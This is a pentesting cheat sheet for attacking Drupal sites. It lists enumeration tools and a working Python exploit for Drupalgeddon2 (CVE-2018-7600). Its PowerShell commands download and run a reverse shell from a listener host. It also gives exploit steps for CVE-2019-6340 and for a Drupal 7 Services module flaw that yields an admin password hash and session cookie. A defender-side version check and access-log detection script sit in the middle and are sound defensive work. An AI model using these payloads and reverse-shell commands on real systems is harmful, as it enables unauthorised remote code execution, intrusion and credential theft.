Content Management Systems

Interesting Writeups

https://blog.ripstech.com

Drupal

Enumeration

#https://github.com/droope/droopescan
./droopescan scan drupal -u 10.10.10.13

#https://github.com/immunIT/drupwn
python3 drupwn <URL>

Drupalgeddon2 RCE [ Drupal < 7.58 | 8.x < 8.3.9 | 8.4.x < 8.4.6 | 8.5.x < 8.5.1]

Exploit 1

#Usage
python3 exploit.py http://10.10.10.9 -c whoami

#Reverse shell
python3 exploit.py http://10.10.10.9 -c "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 9001"

Exploit 2

#!/usr/bin/env python3
import sys
import requests

#######################################################
# Simple Exploit for CVE 2018-7600 (Drupalgeddon 2)
# Usage: python3 drupalgeddon.py http://target-address
#######################################################

if len(sys.argv) != 2:
    print("Usage: python3 drupalgeddon.py http://target-address")
    sys.exit(1)

target = sys.argv[1].rstrip('/')

# Command the target runs; here it pulls a PowerShell reverse shell from the listener host.
command = '''powershell -c IEX (New-Object Net.WebClient).downloadstring('http://192.168.206.133:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.206.133 -Port 8081'''

# Form API AJAX callback; the %23 ('#') in element_parents reaches a render-array property.
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
# Injected render-array keys: the #post_render callback 'exec' is applied to #markup (the command).
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': command}

print("Sending Payload...")

r = requests.post(url, data=payload)

print("Payload Sent.")
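Two defender-side checks for the Drupalgeddon2 entries above (the version ranges in the heading and the request used by Exploit 2), added here as an example and not code from the page's sources: a patch-status check that encodes the affected ranges exactly as listed, and a scan over web server access log lines that flags the AJAX-callback request shape the exploit uses. The combined log format, the constructed sample lines, and the "element_parents contains '#'" heuristic are assumptions drawn from the request shown above, not from an official signature.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Affected ranges exactly as listed above for Drupalgeddon2 (CVE-2018-7600):
# Drupal < 7.58 | 8.x < 8.3.9 | 8.4.x < 8.4.6 | 8.5.x < 8.5.1


def parse_version(version: str) -> tuple:
    """'8.5.0' -> (8, 5, 0); tuples compare component-wise, like versions."""
    return tuple(int(part) for part in version.strip().split("."))


def is_drupalgeddon2_affected(version: str) -> bool:
    """True if the given Drupal core version falls inside the ranges listed above."""
    v = parse_version(version)
    if v < (8,):                     # 7.x (and older) branch: fixed in 7.58
        return v < (7, 58)
    if v[0] == 8:
        minor = v[1] if len(v) > 1 else 0
        if minor <= 3:               # 8.0 - 8.3: fixed in 8.3.9
            return v < (8, 3, 9)
        if minor == 4:               # 8.4.x: fixed in 8.4.6
            return v < (8, 4, 6)
        if minor == 5:               # 8.5.x: fixed in 8.5.1
            return v < (8, 5, 1)
    return False                     # 8.6+ and later majors shipped with the fix


# Combined log format (Apache/nginx default); assumed format for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def is_drupalgeddon2_request(target: str) -> bool:
    """Heuristic drawn from the request in Exploit 2 above: a Drupal AJAX form
    callback (_wrapper_format=drupal_ajax) whose element_parents path descends
    into a '#'-prefixed render-array property (e.g. account/mail/#value).
    Ordinary AJAX form traffic uses element_parents without a '#' component."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("_wrapper_format", [""])[0] != "drupal_ajax":
        return False
    # parse_qs already decodes %23 -> '#'; unquote once more catches double encoding.
    return any("#" in unquote(value) for value in query.get("element_parents", []))


def scan_access_log(lines):
    """Return one dict per log line that matches the heuristic."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_drupalgeddon2_request(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "target": m["target"], "status": int(m["status"])})
    return hits


# Constructed sample lines (not real traffic): one exploit attempt, one normal page
# load, one legitimate AJAX form callback that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /user/register HTTP/1.1" 200 4096',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /user/register?element_parents=account&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ver in ("7.57", "7.58", "8.5.0", "8.5.1"):
        print(ver, "affected" if is_drupalgeddon2_affected(ver) else "patched")
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious:", hit["ip"], hit["method"], hit["target"])
```

Only the first sample line is reported: the third line is a normal Drupal AJAX callback (same `_wrapper_format`, no `#` in `element_parents`), which is why the check keys on the `#` component rather than on the AJAX parameters alone. The POST body keys (`mail[#post_render][]` and friends) never reach an access log, so a request log scan can only see the query-string half of the exploit; a WAF or application log that captures form fields can match on those as well.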

Drupal 8.x [CVE-2019-6340]

Unauthenticated remote code execution flaw in Drupal 8's REST API module; it affects sites that have the Drupal REST API option enabled.

Exploit guide : https://medium.com/@briskinfosec/drupal-core-remote-code-execution-vulnerability-cve-2019-6340-35dee6175afa

Exploit : https://www.exploit-db.com/exploits/46459

python3 Drupal.py <Target-URL> <OS-Command>

Drupal 7.x Module Services

The exploit returns the admin user's password hash and a valid session cookie.

  • searchsploit -x php/webapps/41564.php

  • Identify the rest_endpoint and rest_path and modify them in the payload script.

    • Check <URL>/rest, <URL>/rest_endpoint

  • Execute:

apt-get install php-curl
#Two comments in the script are not wrapped properly; fix them before running.
php 41564.php

  • Two files are created in the current directory.

  • You can either use the session details with a cookie manager or attempt to crack the admin password hash.
